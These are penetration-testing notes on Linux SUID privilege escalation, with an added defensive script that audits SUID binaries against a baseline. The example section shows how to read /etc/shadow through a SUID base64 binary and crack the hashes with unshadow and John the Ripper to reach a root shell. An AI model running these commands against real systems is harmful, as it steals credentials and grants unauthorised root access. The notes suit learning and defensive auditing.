SUID

General method to find files with SUID bit

$ find / -perm -u=s -type f 2>/dev/null

If there's a particular binary found that has the SUID bit set, refer to https://gtfobins.github.io/ to potentially find an exploit.
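
As an added defensive check (not part of the original notes): the find command above wrapped in a small audit helper that compares a host's SUID list against an approved baseline, so an unexpected binary such as base64 gaining the SUID bit stands out immediately. The baseline file and its contents are assumed.

```shell
#!/bin/sh
# Added audit helper, not from the original notes. The baseline file is a
# hypothetical list of SUID binaries that are expected on the host, one path
# per line (e.g. /usr/bin/passwd, /usr/bin/sudo).

# Print every SUID file on the local filesystems, sorted, one path per line.
list_suid() {
    find / -xdev -perm -u=s -type f 2>/dev/null | sort -u
}

# Read a list of SUID paths on stdin, compare it with the baseline file given
# as $1, and print only the paths that are present but not approved.
unexpected_suid() {
    baseline="$1"
    tmp=$(mktemp) || return 1
    sort -u > "$tmp"
    # comm -13 keeps lines unique to the second input (the observed list).
    sort -u "$baseline" | comm -13 - "$tmp"
    rm -f "$tmp"
}

# Typical use, e.g. from cron: list_suid | unexpected_suid /etc/suid.baseline
```

An empty result means the host matches its baseline; any printed path is a binary that was not approved and should be explained or remediated.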

Example

Suppose the binary /usr/bin/base64 is found to have the SUID bit set. This can be exploited to view the contents of the /etc/shadow file.

$ base64 /etc/shadow | base64 -d > shadow.txt
$ cat /etc/passwd > passwd.txt

The unshadow command can be used on the shadow.txt and passwd.txt files to create a file that is crackable by John the Ripper.

$ unshadow passwd.txt shadow.txt > password.txt
$ john --wordlist=[wordlist] password.txt
...

Subsequently, the password for a user with more privileges than the current one may be cracked. This allows access to that account to further escalate privileges. For example, the cracked user may have SUID binaries available, or sudo privileges for certain binaries that can be abused to obtain a root shell.